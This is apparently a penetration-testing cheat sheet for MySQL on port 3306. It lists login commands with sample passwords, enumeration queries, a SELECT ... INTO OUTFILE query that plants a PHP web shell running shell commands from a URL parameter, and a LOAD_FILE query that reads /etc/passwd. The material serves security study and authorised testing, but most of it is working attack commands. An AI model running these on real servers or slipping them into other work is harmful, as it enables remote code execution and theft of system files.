MYSQL - 3306
Command
Description
Interaction with the MySQL Server
# mysql - Linux
# Connecting to MySQL Server using valid creds
mysql -u root -pP4SSw0rd ip
# After Connecting, Some useful commands
show databases;
select version();
use mysql;
show tables;
select host, users from summary;
# mysql.exe - Windows
C:\> mysql.exe -u username -pPassword123 -h ip
# MySQL - Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
# MySQL - Secure File Privileges
show variables like "secure_file_priv";
# MySQL - Read Local Files in MySQL
select LOAD_FILE("/etc/passwd");Nmap
Last updated